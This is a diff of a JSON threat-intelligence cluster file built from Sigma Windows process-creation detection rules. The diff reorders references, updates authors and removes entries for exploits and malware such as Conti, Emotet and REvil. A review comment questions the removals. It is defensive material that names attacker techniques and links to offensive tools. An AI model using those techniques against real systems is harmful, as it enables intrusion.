- "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084",
- "meta": {
- "author": "Bhabesh Raj",
- "creation_date": "2021/09/08",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/h3v0x/CVE-2021-26084_Confluence",
- "https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html",
- "https://nvd.nist.gov/vuln/detail/CVE-2021-26084",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.execution",
- "attack.t1190",
- "attack.t1059"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "245f92e3-c4da-45f1-9070-bc552e06db11",
- "value": "Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt"
- },
{
"description": "Detects new process creation using WMIC via the \"process call create\" flag",
"meta": {
@@ -61050,9 +58754,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.001/T1562.001.md",
- "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/",
"https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md",
+ "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.001/T1562.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_susp_paths.yml"
],
"tags": [
@@ -61094,8 +58798,8 @@
"logsource.product": "windows",
"refs": [
"https://twitter.com/pabraeken/status/990758590020452353",
- "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vsjitdebugger/",
"https://docs.microsoft.com/en-us/visualstudio/debugger/debug-using-the-just-in-time-debugger?view=vs-2019",
+ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vsjitdebugger/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml"
],
"tags": [
@@ -61115,39 +58819,6 @@
"uuid": "15c7904e-6ad1-4a45-9b46-5fb25df37fd2",
"value": "Malicious PE Execution by Microsoft Visual Studio Debugger"
},
- {
- "description": "Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/08/11",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_exploit_other_systemnightmare.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/GossiTheDog/SystemNightmare",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_other_systemnightmare.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.t1068"
- ]
- },
- "related": [
- {
- "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "c01f7bd6-0c1d-47aa-9c61-187b91273a16",
- "value": "Potential SystemNightmare Exploitation Attempt"
- },
{
"description": "Detects scheduled task creations that have suspicious action command and folder combinations",
"meta": {
@@ -61358,9 +59029,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/",
- "https://www.fireeye.com/blog/threat-research/2020/01/saigon-mysterious-ursnif-fork.html",
"https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/",
+ "https://www.fireeye.com/blog/threat-research/2020/01/saigon-mysterious-ursnif-fork.html",
+ "https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_driverquery_usage.yml"
],
"tags": [
@@ -61371,9 +59042,9 @@
"value": "DriverQuery.EXE Execution"
},
{
- "description": "Detects a process memory dump performed by RdrLeakDiag.exe",
+ "description": "Detects the use of the Microsoft Windows Resource Leak Diagnostic tool \"rdrleakdiag.exe\" to dump process memory",
"meta": {
- "author": "Cedric MAURUGEON",
+ "author": "Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)",
"creation_date": "2021/09/24",
"falsepositive": [
"Unknown"
@@ -61383,7 +59054,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://twitter.com/0gtweet/status/1299071304805560321?s=21",
"https://www.pureid.io/dumping-abusing-windows-credentials-part-1/",
+ "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/",
+ "https://lolbas-project.github.io/lolbas/Binaries/Rdrleakdiag/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml"
],
"tags": [
@@ -61401,51 +59075,7 @@
}
],
"uuid": "edadb1e5-5919-4e4c-8462-a9e643b02c4b",
- "value": "Process Dump via RdrLeakDiag.exe"
- },
- {
- "description": "Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM",
- "meta": {
- "author": "MSTIC, FPT.EagleEye",
- "creation_date": "2021/06/15",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_apt_sourgrum.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/",
- "https://github.com/Azure/Azure-Sentinel/blob/43e9be273dca321295190bfc4902858e009d4a35/Detections/MultipleDataSources/SOURGUM_IOC.yaml",
- "https://www.virustotal.com/gui/file/c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d/detection",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_sourgrum.yml"
- ],
- "tags": [
- "attack.t1546",
- "attack.t1546.015",
- "attack.persistence",
- "attack.privilege_escalation"
- ]
- },
- "related": [
- {
- "dest-uuid": "b6301b64-ef57-4cce-bb0b-77026f14a8db",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "bc0f5e80-91c0-4e04-9fbb-e4e332c85dae",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "7ba08e95-1e0b-40cd-9db5-b980555e42fd",
- "value": "SOURGUM Actor Behaviours"
+ "value": "Process Memory Dump via RdrLeakDiag.EXE"
},
{
"description": "Detects usage of bitsadmin downloading a file using an URL that contains an IP",
@@ -61460,10 +59090,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://isc.sans.edu/diary/22264",
"https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/",
- "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
+ "https://isc.sans.edu/diary/22264",
"https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/",
+ "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_direct_ip.yml"
],
"tags": [
@@ -61530,8 +59160,8 @@
"logsource.product": "windows",
"refs": [
"https://www.echotrail.io/insights/search/mshta.exe",
- "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/",
"https://en.wikipedia.org/wiki/HTML_Application",
+ "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_susp_pattern.yml"
],
"tags": [
@@ -61564,8 +59194,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md",
+ "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml"
],
"tags": [
@@ -61606,8 +59236,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://strontic.github.io/xcyclopedia/library/stordiag.exe-1F08FC87C373673944F6A7E8B18CD845.html",
"https://twitter.com/eral4m/status/1451112385041911809",
+ "https://strontic.github.io/xcyclopedia/library/stordiag.exe-1F08FC87C373673944F6A7E8B18CD845.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_stordiag_susp_child_process.yml"
],
"tags": [
@@ -61641,8 +59271,8 @@
"logsource.product": "windows",
"refs": [
"https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/",
- "https://www.nirsoft.net/utils/nircmd2.html#using",
"https://www.nirsoft.net/utils/nircmd.html",
+ "https://www.nirsoft.net/utils/nircmd2.html#using",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_nircmd_as_system.yml"
],
"tags": [
@@ -61699,7 +59329,7 @@
{
"description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credential",
"meta": {
- "author": "frack113",
+ "author": "frack113, Nasreddine Bencherchali (Nextron Systems)",
"creation_date": "2021/07/20",
"falsepositive": [
"Unknown"
@@ -61876,9 +59506,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh750728(v=ws.11)",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md",
"https://github.com/swagkarna/Defeat-Defender-V1.2.0",
- "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh750728(v=ws.11)",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_file_permission_modifications.yml"
],
"tags": [
@@ -61911,8 +59541,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/",
"https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/",
+ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dnx.yml"
],
"tags": [
@@ -61953,8 +59583,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/danielbohannon/Invoke-DOSfuscation",
"https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/dosfuscation-report.pdf",
+ "https://github.com/danielbohannon/Invoke-DOSfuscation",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_dosfuscation.yml"
],
"tags": [
@@ -62016,56 +59646,6 @@
"uuid": "cdf05894-89e7-4ead-b2b0-0a5f97a90f2f",
"value": "Potential Encoded PowerShell Patterns In CommandLine"
},
- {
- "description": "Detects commands used by Turla group as reported by ESET in May 2020",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2020/05/26",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_apt_turla_comrat_may20.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_turla_comrat_may20.yml"
- ],
- "tags": [
- "attack.g0010",
- "attack.execution",
- "attack.t1059.001",
- "attack.t1053.005",
- "attack.t1027"
- ]
- },
- "related": [
- {
- "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "9e2e51c5-c699-4794-ba5a-29f5da40ac0c",
- "value": "Turla Group Commands May 2020"
- },
{
"description": "Detects usage of \"ProtocolHandler\" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE)",
"meta": {
@@ -62134,86 +59714,6 @@
"uuid": "b7966f4a-b333-455b-8370-8ca53c229762",
"value": "Dropping Of Password Filter DLL"
},
- {
- "description": "Detects a command used by conti to dump database",
- "meta": {
- "author": "frack113",
- "creation_date": "2021/08/16",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_malware_conti_ransomware_database_dump.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://docs.microsoft.com/en-us/sql/tools/sqlcmd-utility?view=sql-server-ver15",
- "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection",
- "https://twitter.com/vxunderground/status/1423336151860002816?s=20",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti_ransomware_database_dump.yml"
- ],
- "tags": [
- "attack.collection",
- "attack.t1005"
- ]
- },
- "related": [
- {
- "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "2f47f1fd-0901-466e-a770-3b7092834a1b",
- "value": "Potential Conti Ransomware Database Dumping Activity"
- },
- {
- "description": "Detects all Emotet like process executions that are not covered by the more generic rules",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2019/09/30",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_malware_emotet.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://app.any.run/tasks/81f3c28c-c686-425d-8a2b-a98198d244e1/",
- "https://app.any.run/tasks/84fc9b4a-ea2b-47b1-8aa6-9014402dfb56/",
- "https://app.any.run/tasks/e13ab713-64cf-4b23-ad93-6dceaa5429ac/",
- "https://app.any.run/tasks/97f875e8-0e08-4328-815f-055e971ba754/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_emotet.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.001",
- "attack.defense_evasion",
- "attack.t1027"
- ]
- },
- "related": [
- {
- "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18",
- "value": "Potential Emotet Activity"
- },
{
"description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file",
"meta": {
@@ -62227,10 +59727,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt",
"https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464",
- "https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/",
+ "https://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt",
"https://twitter.com/max_mal_/status/1542461200797163522",
+ "https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_susp_download.yml"
],
"tags": [
@@ -62324,41 +59824,6 @@
"uuid": "730fc21b-eaff-474b-ad23-90fd265d4988",
"value": "Psexec Execution"
},
- {
- "description": "Detects a specific command used by the Conti ransomware group",
- "meta": {
- "author": "frack113",
- "creation_date": "2021/10/12",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_malware_conti_ransomware_commands.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/",
- "https://twitter.com/VK_Intel/status/1447795359900704769?t=Xz7vaLTvaaCZ5kHoZa6gMw&s=19",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti_ransomware_commands.yml"
- ],
- "tags": [
- "attack.impact",
- "attack.s0575",
- "attack.t1486"
- ]
- },
- "related": [
- {
- "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "689308fc-cfba-4f72-9897-796c1dc61487",
- "value": "Potential Conti Ransomware Activity"
- },
{
"description": "Detects suspicious process related to rasdial.exe",
"meta": {
@@ -62406,8 +59871,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md",
"https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_creation.yml"
],
"tags": [
@@ -62441,9 +59906,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://www.intrinsec.com/apt27-analysis/",
"https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/",
"https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/",
- "https://www.intrinsec.com/apt27-analysis/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_snapins_hafnium.yml"
],
"tags": [
@@ -62547,27 +60012,6 @@
"uuid": "853e74f9-9392-4935-ad3b-2e8c040dae86",
"value": "UAC Bypass Using DismHost"
},
- {
- "description": "Detects potential exploitation of CVE-2023-21554 (dubbed QueueJumper)",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2023/04/12",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_exploit_cve_2023_21554_queuejumper.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://research.checkpoint.com/2023/queuejumper-critical-unauthorized-rce-vulnerability-in-msmq-service/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2023_21554_queuejumper.yml"
- ],
- "tags": "No established tags"
- },
- "uuid": "53207cc2-0745-4c19-bc72-80be1cc16b3f",
- "value": "Potential CVE-2023-21554 QueueJumper Exploitation"
- },
{
"description": "Detects suspicious Plink tunnel port forwarding to a local port",
"meta": {
@@ -62581,8 +60025,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d",
"https://www.real-sec.com/2019/04/bypassing-network-restrictions-through-rdp-tunneling/",
+ "https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_plink_port_forwarding.yml"
],
"tags": [
@@ -62656,9 +60100,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5",
"https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/",
"https://lolbas-project.github.io/lolbas/Binaries/Verclsid/",
- "https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_verclsid_runs_com.yml"
],
"tags": [
@@ -62727,8 +60171,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1",
"https://github.com/albertzsigovits/malware-notes/blob/c820c7fea76cf76a861b28ebc77e06100e20ec29/Ransomware/Maze.md",
+ "https://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_product_class.yml"
],
"tags": [
@@ -62795,9 +60239,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/mrd0x/status/1511415432888131586",
"https://lolbas-project.github.io/lolbas/OtherMSBinaries/DumpMinitool/",
"https://twitter.com/mrd0x/status/1511489821247684615",
+ "https://twitter.com/mrd0x/status/1511415432888131586",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dumpminitool_susp_execution.yml"
],
"tags": [
@@ -62860,8 +60304,8 @@
"logsource.product": "windows",
"refs": [
"https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/",
- "https://twitter.com/frack113/status/1555830623633375232",
"https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN",
+ "https://twitter.com/frack113/status/1555830623633375232",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_image.yml"
],
"tags": [
@@ -62895,9 +60339,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn",
- "https://eqllib.readthedocs.io/en/latest/analytics/c91f422a-5214-4b17-8664-c5fcf115c0a2.html",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070/T1070.md",
+ "https://eqllib.readthedocs.io/en/latest/analytics/c91f422a-5214-4b17-8664-c5fcf115c0a2.html",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_usage.yml"
],
"tags": [
@@ -63030,8 +60474,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md",
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_sysinternals_sdelete.yml"
],
"tags": [
@@ -63122,12 +60566,12 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/",
+ "https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/",
"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil",
- "https://learn.microsoft.com/en-us/archive/blogs/pki/basic-crl-checking-with-certutil",
"https://lolbas-project.github.io/lolbas/Binaries/Certutil/",
"https://twitter.com/JohnLaTwC/status/835149808817991680",
- "https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/",
+ "https://learn.microsoft.com/en-us/archive/blogs/pki/basic-crl-checking-with-certutil",
+ "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_decode.yml"
],
"tags": [
@@ -63160,10 +60604,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment",
- "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/",
"https://twitter.com/Cyb3rWard0g/status/1453123054243024897",
+ "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment",
"https://github.com/antonioCoco/RogueWinRM",
+ "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_child_process_as_system_.yml"
],
"tags": [
@@ -63183,67 +60627,6 @@
"uuid": "590a5f4c-6c8c-4f10-8307-89afe9453a9d",
"value": "Suspicious Child Process Created as System"
},
- {
- "description": "Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/07/03",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_apt_revil_kaseya.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/",
- "https://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers",
- "https://www.joesandbox.com/analysis/443736/0/html",
- "https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b",
- "https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_revil_kaseya.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059",
- "attack.g0115"
- ]
- },
- "related": [
- {
- "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "5de632bc-7fbd-4c8a-944a-fce55c59eae5",
- "value": "REvil Kaseya Incident Malware Patterns"
- },
- {
- "description": "Detects commandline containing reference to files ending with a \".\" This scheme has been seen used by raspberry-robin",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2022/10/28",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml"
- ],
- "tags": [
- "attack.execution"
- ]
- },
- "uuid": "a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a",
- "value": "Potential Raspberry Robin Dot Ending File"
- },
{
"description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.",
"meta": {
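Review bot: this hunk removes two complete clusters, "REvil Kaseya Incident Malware Patterns" (uuid 5de632bc-7fbd-4c8a-944a-fce55c59eae5) and "Potential Raspberry Robin Dot Ending File" (uuid a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a), without any tombstone, so the "related" link from the REvil entry to dest-uuid 7385dfaf-6886-4229-9ecd-6fd678040830 and any event tags using these values are silently orphaned. Please confirm these rules were deprecated upstream rather than dropped by the generator, and consider keeping the entries with a deprecation marker instead of deleting them outright.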
@@ -63319,8 +60702,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.ired.team/offensive-security/lateral-movement/t1076-rdp-hijacking-for-lateral-movement",
"http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html",
